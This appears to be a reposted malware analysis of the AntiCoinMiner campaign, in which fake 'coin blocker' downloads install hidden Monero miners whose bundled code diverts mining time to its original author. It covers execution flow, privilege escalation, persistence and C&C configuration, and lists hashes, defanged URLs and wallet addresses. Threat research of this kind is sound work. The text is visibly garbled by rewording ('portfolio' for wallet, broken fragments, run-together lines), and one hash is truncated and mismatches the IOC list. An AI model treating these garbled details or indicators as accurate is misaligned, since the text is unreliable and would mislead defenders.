The Coinminer malware has been on the rise for some time. As more and more users become aware of this threat and try to take measures to protect themselves, cybercriminals attempt to cash in on that fear by serving crypto-miner malware from a Web site that claims to offer a monetary lock. Although the website is not professional and seems suspicious for the most part, there are many non-tech savvy users who may not believe it. Figure 1. Source website We have observed two variants of this malware strain served by the website mentioned above and by coin-blocker [.] com. In both cases, the malware operator uses dangerous miner code written by another author for his financial gains and in the process he is deceiving himself. CryptoMiner Variant # 1 MD5s: 927adcebfa52b3551bdd008b42033a6e and c777e949686f49cc0a03d0d03c5e68a The first malware variant was downloaded with file names like "cr_blocker_v12.exe", "apollo.exe" and was making extensive use of batch files. First of all, a batch file will be released and executed, which will then execute a PowerShell command (a slightly modified version of the PowerShell script from http: // moneroocean [.] stream) to download and run a batch script (one more copy of moneroocean & # 39; s xmrig_setup.bat) from the same website. The purpose of the final batch script is to download, configure and run the miner on the infected system. Figure 2. Execution flow and batch files executed by the malware The above script comes from a script published on the MoneroOcean GitHub account with two minor changes. The malware writer has modified the DownloadFile URL to point to a copy of the official min batch file hosted on the malware site. The second and obvious change is the change of address of the wallet, in which the attacker is collecting revenue from this dull mining campaign. This address has not yet earned much (as of August 16, 2018, only 1.298239 XMR has been paid), but this campaign has just begun, so it's early to draw conclusions. CryptoMiner Variant # 2 MD5s: d3fa184981b21e46f81da37f7c2cf41e The second malware variant was seen downloaded with the file name start_me_now.exe which will further download another file named start_me.exe from the same domain and execute that file. The downloaded file is a SFX archive containing multiple files, including xmr-stak and xmrig miner with the same configuration. Image: Flowchart of the Cryptominer SFX variant The malware operator used a version of Playerz Multi Hidden Cryptocurrency Miner from multicryptominer [.] com with the addition of silent.exe containing a built-in copy of xmrig miner . Silent.exe will run xmrig miner by entering it in a process like notepad.exe. Figure 3. SFX Script from start_me.exe Batch files are single-line scripts in this case, as shown below; run.bat will run c: ProgramData playersclub player.exe and share.bat will open xmrminingpro [.] com / share.html in an attempt to convince the user to share this website on social media sites – Twitter, Facebook and Google Plus – resulting in further infections. Figure 4. Batch file Setup.exe and all the other files that are part of this SFX archive belong to Playerz Multi Hidden Cryptocurrency Miner, details of which follow. Playerz Multi Hidden Cryptocurrency Miner setup.exe This will run setup.exe, which will copy the "pcdata" folder and its files to C: programdata playersclub and run installer.exe. Figure 5. Script Autohotkey from setup.exe Installer.exe Will record and run xmr-stak as a service using launchserv.exe, allowing it to run with higher privileges, and will also create C: programdata playersclub player.txt by taking data configuration from playerconfig.txt: Figure 6. Autohotkey script from installer.exe Launchserv.exe will use the following configuration to register the service: Figure 7. File system LaunchServ.iniSpawn.exe systemSpawn.exe is registered as a service for the purpose of making sure that player.exe exists in the C: programdata playersclub directory and, if not downloaded, run it with escalated privileges using PaExec.exe (similar to Microsoft's PsExec tool) from poweradmin [.] com / paexec /. Figure 8. Autohotkey script from systemSpawn.exe It will run player.exe using the following options to get privileges escalated: -s (run the process in the system account), -x (display the user interface on the secure desktop Winlogon), – d (do not wait for the process to finish [non-interactive]), -i (run the program so that it interacts with the session desktop specified on the specified system. If no session is specified, the process is executed in the session of the console). player.exe Player.exe is the main process responsible for managing the xmr-stak.exe process. It will do everything mentioned by the author of the malware on its website, such as: run when the computer is idle; check if the video or audio is playing; download automatically and, if necessary, update the miner software; kill the processes mentioned in all ProcessesList.txt and more. Ironically, the author of Playerz Multi Hidden Cryptocurrency Miner has provided a portfolio address for donations to help finance the development of this malware. Figure 9. Donation address mentioned on the website But it was not enough, the author also added a backdoor feature to extract the cryptocurrency for their own address in the mutlicryptominer binary. It will verify the modified timestamp of player.txt, and if that file has more than five days, it will get the last configuration from multicryptominer [.] com / pool2.xml. Figure 10. Downloading the latest configuration from C & C It will analyze the received data as shown below: Figure 11. Analysis of the C & C Response configuration from the C & C server: Figure 11. Configuration received from the server It will then calculate the time required for the execution of the original author and of the second-level malware operator on the infected system: Figure 12. Distribution of the calculation time for the extraction of the address 39; author and customer In case the server does not respond with the correct configuration, or player.txt is no more than five days, it will run the miner of the second-level malware operator for 105 minutes and author for 15 minutes ; otherwise, it will distribute the time between mining addresses based on a value received from the server. At the time of analysis, the server sent the maximum possible value of nine, which means that it divides the time of mining between author and customer in a 3 to 1 ratio (90 minutes per author and 30 minutes per customer). After downloading the backdoor configuration and calculation time, will start the timers for various activities: Figure 13. Timer for the execution and stopping of the mining process When the conditions are met for the execution for example, when the system is idle and no video or audio is playing: it will run the miner using runProcesses.exe. This will also ensure that the end user does not notice any obvious slowdown of the system resulting from the mining operation. Figure 14. Run the miner processes using runProcesses.exe Also starts a timer with callback to terminate the process after timeout. runProcesses.exe This will try to detect CPU and graphics to run miner with optimal settings and, in case no configuration is downloaded from C & C, it also includes hardcoded portfolio addresses for mining. Figure 15. Hard-coded addresses used if configuration is not received from the server Conclusion There is a growing trend of new cryptographic malware families and existing malware families adding cryptominnig support as outlined in our previous writing here. The AntiCoinMiner malware operator is taking advantage of the tried and tested scareware tactics and very similar to the FakeAV malware families, where it provides a false sense of security to the end-user while using the machine for financial gains. The malware operator uses off-the-shelf cryptominer malware for this campaign; however the author of the original cryptominer malware has a backdoor functionality embedded in the code that deceives the second-level malware operator by stealing most of the CPU cycles from the infected machines to the mine coins for the original author . Zscaler ThreatLabZ is actively monitoring threats like these and will continue to provide coverage for Zscaler customers. IOC MD5s: 927adcebfa52b3551bdd008b42033a6e d3fa184981b21e46f81da37f7c2cf41e c777e949686f49cc0a03d0d374c5e68a Ecd13814885f698d58b41511791339b6 642cccf03f9493b3d91d84e1b0e55e9c Da8d0c73863afe801bb8937c4445f5f9 D3fa184981b21e46f81da37f7c2cf41e E6569c2c9bceb6a5331d39a897e99152 06ded4e24118a4baccfd2f93fffe3506 927adcebfa52b3551bdd008b42033a6e f8df9d2adf5b92dc4dd419098d444bde B0cec3e582a03c978eaff9a8d01f3c31 D204728ac2e98ac380953deb72d3ca57 c842a49268b52892268e3ff03205b2de 95ea8c948a5254a3b24cbbf3edec1a1a URL: www.xmrminingpro [.] com / start_me_now.exe xmrminingpro [.] com / cr_blocker_v12.exe xmrminingpro.com/Crypto_Blocker_.BAT.exe currency -blocker [.] com / Coin_Blocker_v1.55.exe xmrminingpro [.] com / Apollo-coin-blocker [.] com / Coin_Blocker_v1.5.exe coin-blocker [.] com / vecchio / apollo_stream.exe coin-blocker [.] com / apollo / apollo_x86.exe Wallet addresses: from the examples: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJ indir zzi portfolio hkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQsjqdY9cck94oTET4i 48LYTsUuFis3eheaGJSVC1b4DiftHw8249KCELDPGLU7Ke7GddfV7vM8qmuoW3x3qy8hPXiEknM2jixquq4qbHYHHmWut4J 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQrzvo2Dv3ebJHC95XG 4BEqL8aYcuydaT26Rm9BBDgx5MAPeMSeJGgMd8RJDQKaPZEVySfAaTU8bVMsp2uykJZJ1aJDtyLRHREUBe1XXjfUAty7XJy 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQrzvo2Dv3ebJHC95XG 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQmRkHZngZS7So7FipR Author: encoded in standard: 472dyZhom95Higc85N5E1LbiY3kgbQvapcZ1DosRfjKX4EAvK3ZrdvuLxLMe4vTFbEUAhECZoDZHyGMdFJktrZZyNA3v1Wr received from C & C: 48LYTsUuFis3eheaGJSVC1b4DiftHw8249KCELDPGLU7Ke7GddfV7vM8qmuoW3x3qy8hPXiEknM2jixquq4qbHYHHmWut4J Mentioned for the donation: 48YAdSiCmzSPXxbrqjhnkVNLfFwcX6uJvV6wVGxNdDZ1Fww43c6zdjo1HePWZY6KXp78q8kv5rcqFYM76uSpPv8u4E2pnuq
Recent Articles By Author [19659003] *** This is a blog blog of Security Bloggers Network from the research blog created by [email protected]. Read the original post at https://www.zscaler.com/blogs/research/anticoinminer-mining-campaign